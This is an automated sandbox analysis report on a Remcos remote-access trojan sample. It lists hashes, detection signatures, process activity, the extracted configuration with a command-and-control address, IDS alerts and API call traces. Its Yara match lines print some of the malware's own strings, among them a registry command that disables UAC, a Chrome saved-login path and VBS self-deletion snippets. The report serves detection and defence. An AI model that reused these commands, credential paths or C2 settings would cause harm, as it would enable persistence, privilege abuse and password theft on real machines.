
Windows Analysis Report
l1QC9H0SNR.exe

Overview

General Information

Sample name: l1QC9H0SNR.exe (renamed because the original name is a hash value)
Original sample name: c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0.exe
Analysis ID: 1588244
MD5: be20dfffcba37064d6087aa714036873
SHA1: 4f50f7f954ed27b8e3373a5d900905d98d1bb51e
SHA256: c889443786dc57c284a40fd1a9764bad2f026a8c20e191059707d1646ff931e0
Tags: exe, RemcosRAT, user-adrian__luca

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • l1QC9H0SNR.exe (PID: 5912 cmdline: "C:\Users\user\Desktop\l1QC9H0SNR.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
    • Milburr.exe (PID: 3652 cmdline: "C:\Users\user\Desktop\l1QC9H0SNR.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
  • wscript.exe (PID: 4156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Milburr.exe (PID: 364 cmdline: "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
      • Milburr.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Local\obtenebrate\Milburr.exe" MD5: BE20DFFFCBA37064D6087AA714036873)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware Configuration Extractor: Remcos
{"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
Source | Rule | Description | Author | Strings
2.2.Milburr.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
2.2.Milburr.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
2.2.Milburr.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
2.2.Milburr.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
2.2.Milburr.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , ProcessId: 4156, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs" , ProcessId: 4156, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Milburr.vbs

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe, ProcessId: 3652, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts for network traffic
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol


AV Detection

                    Source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:3678:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-MKYDDH", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe ReversingLabs: Detection: 75%
                    Source: l1QC9H0SNR.exe Virustotal: Detection: 68%
                    Source: l1QC9H0SNR.exe ReversingLabs: Detection: 75%
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4575991012.0000000003E6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281153273.000000000151B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281175297.0000000001557000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573869491.0000000001151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573965402.0000000001187000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4573167433.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.6% probability
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exe Joe Sandbox ML: detected
                    Source: l1QC9H0SNR.exe Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_0043293A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,5_2_0043293A
                    Source: Milburr.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Milburr.exe.3280000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.3d80000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Milburr.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.Milburr.exe.3630000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2280428273.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.2273702079.0000000003280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4574181082.0000000003630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2281391837.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4567862337.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 3652, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Milburr.exe PID: 5160, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406764 _wcslen,CoGetObject,2_2_00406764
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00406764 _wcslen,CoGetObject,5_2_00406764
                    Source: l1QC9H0SNR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0044D5E9 FindFirstFileExA,2_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406AC2 FindFirstFileW,FindNextFileW,2_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_0072445A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C6D1 FindFirstFileW,FindClose,2_2_0072C6D1
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0072C75C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072EF95
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0072F0F2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072F3F3
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_007237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_007237EF
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00723B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00723B12
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_0072BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0072BCBC
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0040B335
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,5_2_0041B42F
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0040B53A
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_0044D5E9 FindFirstFileExA,5_2_0044D5E9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,5_2_004089A9
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00406AC2 FindFirstFileW,FindNextFileW,5_2_00406AC2
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,5_2_00407A8C
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_00418C69
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 5_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,5_2_00408DA7
                    Source: C:\Users\user\AppData\Local\obtenebrate\Milburr.exeCode function: 2_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00406F06
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\

                    Networking

                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50117 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50075 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50116 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50072 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50111 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50118 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50096 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50119 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50110 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50115 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50102 -> 192.210.150.26:3678
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:50081 -> 192.210.150.26:3678
                    Source: Malware configuration extractorIPs: 192.210.150.26
                    Source: Joe Sandbox ViewIP Address: 192.210.150.26 192.210.150.26
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: C:\Users\user\Desktop\l1QC9H0SNR.exeCode function: 0_2_00BC22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BC22EE
                    Source: Milburr.exeString found in binary or memory: http://geoplugin.net/json.gp
